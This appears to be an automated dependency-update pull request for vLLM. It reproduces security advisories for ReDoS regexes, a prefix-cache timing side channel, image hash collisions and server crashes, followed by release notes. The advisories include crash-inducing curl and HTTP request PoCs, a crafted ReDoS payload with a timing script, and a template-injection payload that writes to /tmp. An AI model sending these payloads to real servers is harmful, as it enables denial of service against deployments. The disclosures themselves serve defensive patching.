Update dependency vllm to v0.10.1.1 [SECURITY] #8

renovate · 2025-05-28T18:27:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
vllm	`==0.8.5` -> `==0.10.1.1`

GitHub Vulnerability Alerts

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False
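
The advisory does not reproduce the script itself. A minimal sketch of such a timing harness is shown below, assuming the quoted pattern is applied with re.match. The function name time_match and the chosen repeat counts are illustrative, and the counts are deliberately small because the run time grows exponentially with the payload length.

```python
import re
import time

# Pattern quoted in the advisory (the pre-fix tool-call regex), split across
# two raw strings only for readability.
TOOL_CALL_REGEX = re.compile(
    r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*"
    r"([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"
)


def time_match(repeat: int) -> tuple[int, float, bool]:
    """Build the crafted payload and time a single match attempt."""
    # The payload never contains a closing "]", so the match must fail,
    # but only after the engine has explored many backtracking paths.
    payload = "[A(A=" + "\t)A(A=,\t" * repeat
    start = time.perf_counter()
    matched = TOOL_CALL_REGEX.match(payload) is not None
    elapsed = time.perf_counter() - start
    return len(payload), elapsed, matched


if __name__ == "__main__":
    # Keep repeat small: each extra repetition multiplies the run time.
    for repeat in range(1, 6):
        length, elapsed, matched = time_match(repeat)
        print(f"Length: {length}, Time: {elapsed:.4f} seconds, Match: {matched}")
```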

Impact

Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

https://github.com/vllm-project/vllm/pull/18454
Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

Limit the input string length.
Use a non-recursive matching approach, or write a regex with stricter content constraints.
Consider using possessive quantifiers or atomic groups (supported by Python's re module only from version 3.11 onward), or split and process before regex matching.
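
As a rough illustration of the first two suggestions, the sketch below caps the input length and replaces the lazy wildcard with a character class that cannot cross a parenthesis. The helper name, the 256-character cap, and the stricter pattern are assumptions made for illustration. They are not the change applied in the vLLM fix, and the stricter pattern does not accept nested parentheses.

```python
import re
from typing import Optional

MAX_NAME_LEN = 256  # hypothetical cap, chosen only for this example

# [^()]* can never match a parenthesis, which bounds how far each match
# attempt can scan before it either succeeds or fails.
_PAREN_SUFFIX = re.compile(r"\(([^()]*)\)\$?$")


def trailing_parenthesized(name: str) -> Optional[str]:
    """Return the text inside a trailing (...) group, or None if absent."""
    if len(name) > MAX_NAME_LEN:
        raise ValueError("input too long")
    match = _PAREN_SUFFIX.search(name)
    return match.group(1) if match else None
```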

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

Limit the length of model_output.
Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
Prefer re.finditer() and enforce a length constraint on each match.
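
The suggestions above could be combined roughly as follows. This is a sketch only: the function name and both limits are hypothetical, and it is not the code used in vLLM's parser.

```python
import re

MAX_OUTPUT_LEN = 16_384  # hypothetical cap on the whole model output
MAX_MATCH_LEN = 4_096    # hypothetical cap on each captured body

_FUNCTOOLS = re.compile(r"functools\[(.*?)\]", re.DOTALL)


def extract_functools_payloads(model_output: str) -> list[str]:
    """Collect the bodies of functools[...] blocks, enforcing size limits."""
    if len(model_output) > MAX_OUTPUT_LEN:
        raise ValueError("model output too long")
    payloads = []
    # finditer yields matches lazily, so each one can be checked in turn.
    for match in _FUNCTOOLS.finditer(model_output):
        body = match.group(1)
        if len(body) <= MAX_MATCH_LEN:
            payloads.append(body)
    return payloads
```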

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

Use a more specific pattern (e.g., via JSON parsing).
Impose limits on current_text length.
Avoid using .* to capture large blocks of text; prefer structured parsing when possible.
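
One way to avoid the wildcard entirely is a plain string search. The sketch below only approximates the regex above (it takes everything after the last "parameters" key). The function name and length limit are assumptions, not vLLM code.

```python
from typing import Optional

PARAMETERS_KEY = '"parameters":'


def text_after_parameters(current_text: str, max_len: int = 65_536) -> Optional[str]:
    """Return the text following the last "parameters": key, if present."""
    if len(current_text) > max_len:
        raise ValueError("current_text too long")
    # rfind is a single linear scan with no backtracking.
    index = current_text.rfind(PARAMETERS_KEY)
    if index == -1:
        return None
    return current_text[index + len(PARAMETERS_KEY):].lstrip()
```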

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

Limit the length of actual.
Prefer stepwise search for { and } or use a robust JSON extraction tool.
Recommend first locating the range with simple string search, then applying regex.
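
A minimal sketch of the "locate first, then parse" approach is shown below. The function name and the length limit are illustrative assumptions. It uses simple string search plus json.loads in place of the regex.

```python
import json
from typing import Any, Optional


def extract_json_object(actual: str, max_len: int = 65_536) -> Optional[Any]:
    """Parse the span from the first "{" to the last "}", or return None."""
    if len(actual) > max_len:
        return None
    start = actual.find("{")
    end = actual.rfind("}")
    if start == -1 or end < start:
        return None
    try:
        # json.loads rejects unbalanced or malformed content outright.
        return json.loads(actual[start:end + 1])
    except json.JSONDecodeError:
        return None
```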

Fix

https://github.com/vllm-project/vllm/pull/18454

CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PagedAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PagedAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment

GPU: NVIDIA A100 (40G)
CUDA: 11.8
PyTorch: 2.3.1
OS: Ubuntu 18.04
vLLM: v0.5.1
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PagedAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.
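
For readers unfamiliar with the metric, the AUC here can be read as the probability that a randomly chosen cache miss is slower than a randomly chosen cache hit. The sketch below computes it directly from two lists of TTFT samples. The function name is illustrative and the sample values in the usage note are made up, not the measurements reported above.

```python
def timing_auc(hit_times: list[float], miss_times: list[float]) -> float:
    """AUC for separating hits from misses by TTFT (ties count as half)."""
    wins = 0.0
    for hit in hit_times:
        for miss in miss_times:
            if miss > hit:
                wins += 1.0   # the miss is slower, as an attacker expects
            elif miss == hit:
                wins += 0.5   # a tie carries no information
    return wins / (len(hit_times) * len(miss_times))
```

With fully separated samples such as timing_auc([1.0, 2.0], [3.0, 4.0]) the result is 1.0, while overlapping samples such as timing_auc([1.0, 3.0], [2.0, 4.0]) give 0.75. A value of 0.5 means the timings are indistinguishable.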

Fixes

https://github.com/vllm-project/vllm/pull/17045

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

Affected file: vllm/multimodal/hasher.py
Affected method: MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
- Incorrect cache hits, leading to abnormal responses
- Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.
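
The collision can be illustrated without any imaging library. In the sketch below, SHA-256 stands in for whatever hash function the cache uses, and the raw bytes stand in for the result of obj.tobytes(). Both function names are hypothetical, and for brevity only size and mode are mixed in (not format or info).

```python
import hashlib


def hash_pixels_only(pixels: bytes) -> str:
    """Hash the raw pixel bytes alone (the behavior described as unsafe)."""
    return hashlib.sha256(pixels).hexdigest()


def hash_with_metadata(pixels: bytes, size: tuple[int, int], mode: str) -> str:
    """Hash the pixel bytes together with the image size and color mode."""
    digest = hashlib.sha256()
    # Prefix the metadata so that images with identical bytes but a
    # different shape or mode produce different digests.
    digest.update(f"{mode}:{size[0]}x{size[1]}:".encode("utf-8"))
    digest.update(pixels)
    return digest.hexdigest()


# 3000 bytes can be read as a 30x100 or a 100x30 single-channel ("L") image.
pixels = bytes(30 * 100)
same_without_metadata = hash_pixels_only(pixels) == hash_pixels_only(pixels)
differ_with_metadata = (
    hash_with_metadata(pixels, (30, 100), "L")
    != hash_with_metadata(pixels, (100, 30), "L")
)
```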

Impact for other modalities
The video modality is affected as well: a video is converted into a multi-dimensional NumPy array (covering height, width, time, and so on), and serializing that array without its shape leads to the same problem.

For audio, since the mono option of librosa.load is left at its default, librosa automatically downmixes the loaded audio to a single channel and returns a one-dimensional NumPy array, so the array structure is fixed and is not affected by this issue.

Fixes

https://github.com/vllm-project/vllm/pull/17378

CVE-2025-48942

Summary

Hitting the /v1/completions API with an invalid json_schema as a Guided Param will kill the vLLM server.

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vLLM with an invalid json_schema, e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
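
A request-side check along the following lines would reject such a schema before it reaches the native compiler. This is a deliberately naive sketch, not the validation added in the fix. The function name is hypothetical, the allowed set is simply the list given above, and a real deployment would more likely rely on a full JSON Schema validator.

```python
ALLOWED_TYPES = {"string", "number", "object", "boolean", "array", "null"}


def find_invalid_types(schema: object, path: str = "$") -> list[str]:
    """Walk a schema and report every "type" value outside ALLOWED_TYPES."""
    problems = []
    if isinstance(schema, dict):
        for key, value in schema.items():
            child = f"{path}.{key}"
            if key == "type" and isinstance(value, str) and value not in ALLOWED_TYPES:
                problems.append(f"{child}: unsupported type {value!r}")
            else:
                problems.extend(find_invalid_types(value, child))
    elif isinstance(schema, list):
        for index, item in enumerate(schema):
            problems.extend(find_invalid_types(item, f"{path}[{index}]"))
    return problems
```

A server could return an HTTP 400 response whenever the returned list is non-empty, instead of passing the schema on.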

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of the runtime errors produced by the crash, depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
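
The general remedy is to attempt compilation while the request is being validated and to turn any failure into a client error. The sketch below shows that shape using Python's re module as a stand-in compiler. This is an assumption for illustration only: Python's regex syntax differs from that of the native engine, so a pattern accepted here may still be rejected there (and vice versa).

```python
import re
from typing import Optional


def validate_pattern(pattern: str) -> Optional[str]:
    """Return an error message if the pattern fails to compile, else None."""
    try:
        # Stand-in for the real grammar compiler; the point is that the
        # exception is caught here instead of escaping into the worker.
        re.compile(pattern)
    except re.error as exc:
        return f"invalid pattern: {exc}"
    return None
```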

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note that the pattern field is set to an RCE payload, although it could just as well have been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}

Impact

Backend workers can be crashed, causing anyone using the inference engine to get 500 internal server errors on subsequent requests.

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48956

Summary

A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.

Details

The vulnerability leverages the abuse of HTTP headers. By setting a header such as X-Forwarded-For to a very large value like ("A" * 5_800_000_000), the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.

Impact

What kind of vulnerability is it? Who is impacted?
Type of vulnerability: Denial of Service (DoS)

Resolution

Upgrade to a version of vLLM that includes appropriate HTTP limits by default, or use a proxy in front of vLLM which provides protection against this issue.
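
The kind of policy such limits express can be sketched as below. The limit values and the function name are hypothetical and are not vLLM's defaults. In practice the limit has to be enforced by the HTTP parser or proxy while the request is still being read, since checking only after the headers are fully buffered would not prevent the memory exhaustion.

```python
MAX_HEADER_COUNT = 256        # hypothetical limit on the number of headers
MAX_HEADER_BYTES = 64 * 1024  # hypothetical limit on total header size


def headers_within_limits(headers: list[tuple[bytes, bytes]]) -> bool:
    """Check a list of (name, value) header pairs against both limits."""
    if len(headers) > MAX_HEADER_COUNT:
        return False
    total = 0
    for name, value in headers:
        total += len(name) + len(value)
        if total > MAX_HEADER_BYTES:
            return False  # stop early once the budget is exceeded
    return True
```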

Release Notes

vllm-project/vllm (vllm)

`v0.10.1.1`

Compare Source

This is a critical bugfix and security release:

Fix CUTLASS MLA Full CUDAGraph (#23200)
Limit HTTP header count and size (#23267): GHSA-rxc4-3w6r-4v47
Do not use eval() to convert unknown types (#23266): GHSA-79j6-g2m3-jgfw

Full Changelog: vllm-project/vllm@v0.10.1...v0.10.1.1

`v0.10.1`

Compare Source

Highlights

v0.10.1 release includes 727 commits, 245 committers (105 new contributors).

Model Support

New model families: GPT-OSS with comprehensive tool calling and streaming support (#22327, #22330, #22332, #22335, #22339, #22340, #22342), Command-A-Vision (#22660), mBART (#22883), and SmolLM3 using Transformers backend (#22665).
Vision-language models: Official Eagle multimodal support with Llama4 backend (#20788), Step3 vision-language models (#21998), Gemma3n multimodal (#20495), MiniCPM-V 4.0 (#22166), HyperCLOVAX-SEED-Vision-Instruct-3B (#20931), Emu3 with Transformers backend (#21319), Intern-S1 (#21628), and Prithvi in online serving mode (#21518).
Enhanced existing models: NemotronH support (#22349), Ernie 4.5 Base 0.3B model name change (#21735), GLM-4.5 series improvements (#22215), Granite models with fused MoE configurations (#21332) and quantized checkpoint loading (#22925), Ultravox support for Llama 4 and Gemma 3 backends (#17818), Mamba1 and Jamba model support in V1 (without CUDA graphs) (#21249)
Advanced model capabilities: Qwen3 EPLB (#20815) and dual-chunk attention support (#21924), Qwen native Eagle3 target support (#22333).
Architecture expansions: Encoder-only models without KV-cache enabling BERT-style architectures (#21270), expanded tensor parallelism support in Transformers backend (#22651), tensor parallelism for Deepseek_vl2 vision transformer (#21494), and tensor/pipeline parallelism with Mamba2 kernel for PLaMo2 (#19674).
V1 engine compatibility: Extended support for additional pooling models (#21747) and Step3VisionEncoder distributed processing option (#22697).

Engine Core

CUDA graph performance: Full CUDA graph support with separate attention routines, adding FA2 and FlashInfer compatibility (#20059), plus 6% end-to-end throughput improvement from Cutlass MLA (#22763).
Attention system advances: Multiple attention metadata builders per KV cache specification (#21588), tree attention backend for v1 engine (experimental) (#20401), FlexAttention encoder-only support (#22273), upgraded FlashAttention 3 with attention sink support (#22313), and multiple attention groups for KV sharing patterns (#22672).
Speculative decoding optimizations: N-gram speculative decoding with single KMP token proposal algorithm (#22437), explicit EAGLE3 interface for enhanced compatibility (#22642).
Default behavior improvements: Pooling models now default to chunked prefill and prefix caching (#20930), disabled chunked local attention by default for Llama4 for better performance (#21761).
Extensibility and configuration: Model loader plugin system (#21067), custom operations support for FusedMoe (#22509), rate limiting with bucket algorithm for proxy server (#22643), torch.compile support for bailing MoE (#21664).
Performance optimizations: Improved startup time by disabling C++ compilation of symbolic shapes (#20836), enhanced headless models for pooling in Transformers backend (#21767).

Hardware & Performance

NVIDIA Blackwell (SM100) optimizations: CutlassMLA as default backend (#21626), FlashInfer MoE per-tensor scale FP8 backend (#21458), SM90 CUTLASS FP8 GEMM with kernel tuning and swap AB support (#20396).
NVIDIA RTX 5090/RTX PRO 6000 (SM120) support: Block FP8 quantization (#22131) and CUTLASS NVFP4 4-bit weights/activations support (#21309).
AMD ROCm platform enhancements: Flash Attention backend for Qwen-VL models (#22069), AITER HIP block quantization kernels (#21242), reduced device-to-host transfers (#22683), and optimized kernel performance for small batch sizes 1-4 (#21350).
Attention and compute optimizations: FlashAttention 3 attention sinks performance boost (#22478), Triton-based multi-dimensional RoPE replacing PyTorch implementation (#22375), async tensor parallelism for scaled matrix multiplication (#20155), optimized FlashInfer metadata building (#21137).
Memory and throughput improvements: Mamba2 reduced device-to-device copy overhead (#21075), fused Triton kernels for RMSNorm (#20839, #22184), improved multimodal hasher performance for repeated image prompts (#22825), multithreaded async multimodal loading (#22710).
Parallelization and MoE optimizations: Guided decoding throughput improvements (#21862), balanced expert sharding for MoE models (#21497), expanded fused kernel support for topk softmax (#22211), fused MoE for nomic-embed-text-v2-moe (#18321).
Hardware compatibility and kernels: ARM CPU build fixes for systems without BF16 support (#21848), Machete memory-bound performance improvements (#21556), FlashInfer TRT-LLM prefill attention kernel support (#22095), optimized reshape_and_cache_flash CUDA kernel (#22036), CPU transfer support in NixlConnector (#18293).
Specialized CUDA kernels: GPT-OSS activation functions (#22538), RLHF weight loading acceleration (#21164).

Quantization

Advanced quantization techniques: MXFP4 and bias support for Marlin kernel (#22428), NVFP4 GEMM FlashInfer backends (#22346), compressed-tensors mixed-precision model loading (#22468), FlashInfer MoE support for NVFP4 (#21639).
Hardware-optimized quantization: Dynamic 4-bit quantization with Kleidiai kernels for CPU inference (#17112), TensorRT-LLM FP4 quantization optimized for MoE low-latency inference (#21331).
Expanded model quantization support: BitsAndBytes quantization for InternS1 (#21953) and additional MoE models (#21370, #21548), Gemma3n quantization compatibility (#21974), calibration-free RTN quantization for MoE models (#20766), ModelOpt Qwen3 NVFP4 support (#20101).
Performance and compatibility improvements: CUDA kernel optimization for Int8 per-token group quantization (#21476), non-contiguous tensor support in FP8 quantization (#21961), automatic detection of ModelOpt quantization formats (#22073).
Breaking change: Removed AQLM quantization support (#22943) - users should migrate to alternative quantization methods.

API & Frontend

